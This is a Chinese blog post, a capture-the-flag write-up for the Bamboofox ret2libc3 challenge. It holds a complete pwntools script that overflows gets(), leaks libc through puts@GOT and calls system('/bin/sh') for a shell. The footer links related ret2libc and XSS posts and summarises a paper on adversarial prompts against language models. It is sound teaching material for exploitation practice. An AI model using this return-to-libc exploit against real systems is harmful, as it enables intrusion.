Bamboofox ret2libc3

最新推荐文章于 2024-09-05 21:41:24 发布
最新推荐文章于 2024-09-05 21:41:24 发布
阅读量103 收藏
点赞数
文章标签: 网络安全 安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_55013445/article/details/133324679
版权

分析

题目链接
分析同之前的ret2libc1 ret2libc2一样
不过,这题在Bamboofox ret2libc2上进阶了一下,这次题目中不再出现system和/bin/sh相关字符串,所以这次得利用libc自行写入其中
在解题之前,先了解下libc基地址如何获取,以及如何利用基地址获取system和/bin/sh

libc_base = function_A_address - function_A_address_in_libc
#method to calculate libc_base
sys_addr = libc_base + sys_addr_in_libc
bin_sh_addr = libc_base + bin_sh_addr_in_libc

在程序中,尤其是在没关闭ASLR保护的情况下,函数的地址(除低12位)会随机改变,但其距离libc基地址的偏移不会改变
所以我们可以利用此特性,先获取libc基地址,然后用libc_database查询其他函数相对基地址的偏移,最后得到函数的地址

解题

先计算函数偏移

pwndbg> cyclic 200
aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
pwndbg> r
Starting program: /home/henhen/Desktop/challenges/Bamboofox ret2libc3/ret2libc3 
No surprise anymore, system disappeard QQ.
Can you find it !?aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
...
...
──────────────────────────────────[ DISASM ]───────────────────────────────────
Invalid address 0x62616164
...
...
pwndbg> cyclic -l 0x62616164
112 //偏移值

接着利用gets()的栈溢出漏洞,把retn地址覆盖为puts_got的地址,利用puts_got泄露libc_base地址

puts_got = elf.got['puts']
puts_plt = 0x8048460

payload = b'a' * 112 + p32(puts_plt) + p32(main_addr) + p32(puts_got)
p.sendlineafter("?",payload)

puts_addr = u32(p.recv(4))
print("puts_addr = ",hex(puts_addr))

运行脚本,显示出puts地址为

puts_addr =  0xf7daac30

接着使用libc_database查询puts函数相对libc_base的偏移量
查询方法示意
一切都明了后,最终exp如下

from pwn import *

p = process('./ret2libc3')
elf = ELF('./ret2libc3')

puts_got = elf.got['puts']
puts_plt = 0x8048460

main_addr = 0x80484d0
#procedures to leak libcbase_addr
#libcbase_addr = puts_addr - libc_puts


payload = b'a' * 112 + p32(puts_plt) + p32(main_addr) + p32(puts_got)
p.sendlineafter("?",payload)

puts_addr = u32(p.recv(4))
print("puts_addr = ",hex(puts_addr))
#puts address in libc is 0x6dc30
libcbase_addr = puts_addr - 0x6dc30
#so,system's address should be libcbase_addr + system's address in libc
system_address = libcbase_addr + 0x41790
str_bin_sh_addr = libcbase_addr +0x18e363

payload = b'a' * 112 + p32(system_address) + p32(main_addr) + p32(str_bin_sh_addr)
p.sendlineafter("?",payload)




p.interactive()
mick0960
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
适合新手的ret2libc3之路
Vicl1fe的博客
05-29 3928
rop之libc3 做了一下这道题,感觉收获蛮大,写一篇博客,也方便自己记忆。 题目链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/basic-rop/#3 参考链接:https://www.jianshu.com/p/5525dde00053 好了回归正题,首先拿到这个题目,ida打开按f5查看伪代码,看到了高危函数...
ret2libc
huzai9527的博客
02-03 459
1. buooj - ciscn_2019_c_1(64 位) from pwn import * #p = remote('node3.buuoj.cn',28190) p = process('./ciscn_2019_c_1') context.log_level = 'debug' puts_plt = 0x4006e0 puts_got = 0x602020 gets_got = 0x602050 pop_rdi = 0x0000000000400c83 main = 0x4009a0 #ste
ret2libc3
m0_49959202的博客
08-06 387
文章目录ret2libc31.程序分析2.栈帧设计3.exp编写 ret2libc3 当前的ret2libc3:无system,无”\bin\sh“ 1.程序分析 首先file一下,发现是32位程序: checksec一下,发现没有开启pie ida分析程序: 发现有个See_something()函数可以用来泄露具体给定地址内的信息: main函数内还有个Print_message(),可以用来栈溢出: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-SKJoX7
基本ROP之ret2libc3
至臻求学,胸怀云月
02-15 5233
ret2libc思路 ret2libc就是控制函数的执行libc中的函数,通常是返回至某个函数的 plt 处或者函数的具体位置 (即函数对应的 got 表项的内容)。一般情况下,我们会选择执行 system("/bin/sh"),因此我们通常需要找到 system 函数的地址。 ret2libc通常可以分为下面这几类: 程序中自身就含有system函数和"/bin/sh"字符串 程序中自身就有s...
ROP-基础-ret2libc3
ATFWUS的博客
02-29 2145
文件下载地址: 链接:https://pan.baidu.com/s/1IMZt9WIlXDZBX2J-hoCyNA 提取码:jrsx 0x01.分析 checksec: Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enab...
栈溢出/ret2shellcode/ret2syscall/ret2libc
m0_63220798的博客
08-20 366
(仅作为本人的学习笔记和心得 如有错误请多指教)
ret2libc2pwn 入门题
02-11
pwn 入门题
pwn小白入门06--ret2libc
weixin_45943522的博客
10-25 8249
概述: 前文介绍了ROP的基本原理,但前面的方法有一些局限性,一旦目标程序调用的函数较少,或者使用动态编译,就会导致我们可以利用的gadget变少,从而无法达到利用效果。为了解决这种问题,我们可以选择使用ROP的方式,到动态链接库里面寻找gadget。即ret2libc。 动态链接库: 说动态链接库之前,先简单介绍一下库,库是一种软件组件技术,库里面封装了数据和函数,比如常用的printf,get函数。前文所说的ret2syscall所使用的程序是静态链接的,即在程序编译的时候就将整个库链接到程序中,一般这
ret2libc2
m0_49959202的博客
08-06 197
文章目录ret2libc21.程序分析2.栈帧构造2.1 第一种构造方式2.2 第二种构造方式3.exp编写 ret2libc2 当前的ret2libc2:有system,无”\bin\sh“ 1.程序分析 找个题和ret2libc1差不多,区别在于程序里面没有现成的"/bin/sh"字符串。 首先checksec一下: file一下: [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ss8LRj6L-1628251397723)(https://i.loli.net/2
基本ROP
听鬼哥说故事
08-29 8658
随着NX保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提出来相应的方法来绕过保护,目前主要的是ROP(Return Oriented Programming),其主要思想是在**栈缓冲区溢出的基础上(这一条之后不再重复提及),通过利用程序中已有的小片段(gadgets)来改变某些寄存器或者变量的值,从而改变程序的执行流程。**所谓gadgets就是以ret结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。
ROP----The Solution For Ret2text
weixin_30276935的博客
06-09 337
APP:   https://github.com/ctf-wiki/ctf-challenges/raw/master/pwn/stackoverflow/ret2text/bamboofox-ret2text/ret2text TOOLS:   pwntools gef gdb objdump readelf    Solution:   Ret2text is...
exp编写小技巧
m0_49959202的博客
08-14 836
文章目录exp编写小技巧1.代码对齐2. 填充为指定长度3. 链接远程服务器或者链接本地文件4. 格式转换5. 环境变量6. 获得汇编指令的机器代码7. 把权限交给用户8. shellcode9. ELF 操作ELF文件的工具11.接收数据12.发送数据13.填充字符,字符串向右/向左填充14.寻找ROP15.使用flat()函数来格式化payload exp编写小技巧 1.代码对齐 exp中填写地址时要注意代码长度的填充 2. 填充为指定长度 3. 链接远程服务器或者链接本地文件 # 远程 r = rem
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8451
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
九盾叉车U型区域警示灯,高效照明和安全警示
jiuxindianzi的博客
09-05 291
九盾叉车U型区域警示灯,LED光源,U型光线设计,覆盖广,亮度高,适应多车型,防护等级高,使用寿命长,有效防止叉车碰撞事故,提升作业安全性。
【看雪-注册安全分析报告】
09-05 1366
看雪学苑(www.kanxue.com)是一个专注于PC、移动、智能设备安全研究及逆向工程的安全综合服务网站!创建于2000年,历经20多年的发展,看雪网站形成了大量有价值的技术资料,经过看雪团队的共同努力,先后出版过数本技术专著,深受出版社和广大读者好评,社会影响深远,在行业中树立了令人尊敬的专业形象。平台为会员提供安全知识的在线课程教学,同时为企业提供智能设备安全相关产品和服务。
注册安全分析报告:央视网
Explinks的博客
09-03 772
央视网作为中央广播电视总台主办的中央重点新闻网站和国家级互联网视频综合传播服务平台, 采用的还是老一代的图形验证码已经落伍了, 用户体验一般,容易被破解, 一旦被国际黑客发起攻击,将会对老百姓形成骚扰,影响声誉。很多人在短信服务刚开始建设的阶段,可能不会在安全方面考虑太多,理由有很多。比如:“需求这么赶,当然是先实现功能啊”,“业务量很小啦,系统就这么点人用,不怕的” , “我们怎么会被盯上呢,不可能的”等等。有一些理由虽然有道理,但是该来的总是会来的。前期欠下来的债,总是要还的。
深入解析反射型 XSS 与存储型 XSS:原理、危害与防范
最新发布
2301_77160226的博客
09-05 733
反射型 XSS 和存储型 XSS 都是常见的 XSS 攻击类型,它们的原理和危害有所不同,但都可以对用户造成严重的危害。为了防范 XSS 攻击,我们需要采取一系列的措施,如输入验证和过滤、输出编码、使用安全的 API 和框架等。同时,我们也需要教育用户提高安全意识,不要点击来自不可信来源的链接,不要在不可信的网站上输入敏感信息。
【论文速读】| SEAS:大语言模型的自进化对抗性安全优化
m0_73736695的博客
09-05 919
在初始化阶段,红队模型和目标模型分别使用不同的数据集进行微调,以增强红队模型生成对抗性提示的能力和目标模型的指令遵循能力。此外,实验还发现,SEAS框架能够在保持模型通用能力的同时,显著增强其抵御攻击的能力。传统方法通常无法有效揭示模型的潜在漏洞,因此,SEAS框架旨在通过自我进化的方式,迭代提升红队模型和目标模型的能力,从而在无需人工干预的情况下增强LLMs的安全性能。SEAS框架的核心优势在于减少了对人工测试的依赖,提供了一种自动化的、安全性持续提升的解决方案,为LLMs的安全部署提供了强有力的支持。
高压喷雾车的功能与应用_鼎跃安全
ShenZhenDingYue的博客
09-05 396
在灭火行动中,高压喷雾车的高效作业能成功阻止了火势蔓延,还能保护救援人们群众的财产安全,极大缩短了灭火时间,减少了火灾损失。高压喷雾车不仅在森林灭火中发挥不可替代的作用,其还能在山地、复杂地形和火势迅速蔓延的情况下,保护生命财产安全。在一次森林火灾中,位于山区的一个小型度假村附近突然起火,由于山风强劲,火势迅速蔓延,消防部门立即调派多辆高压喷雾车赶往现场。由于高压喷雾车产生的细水雾可以迅速蒸发吸热,有效降低火场温度,同时水雾还能将空气中的烟雾和有害气体迅速沉降,保护了周围的生态环境和救援人员的安全
将AI与情境定位结合以确保品牌安全
微信,抖音等国内主要流量平台打通,企业可以无缝把现有的业务场景接入AI能力
09-04 1355
互动广告局 (IAB) 将品牌安全描述为确保你的广告不会出现在不适当、有害或有争议的内容旁边。这些内容可能会损害品牌形象,并可能削弱目标市场的信任度。品牌适配性更进一步。它不仅确保广告避开有害内容,还确保广告与品牌的身份和价值观一致。此举在于寻找广告的“合适”位置,而不仅仅是“安全”的位置。例如,确保奢侈品牌仅出现在高端生活方式内容旁边。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值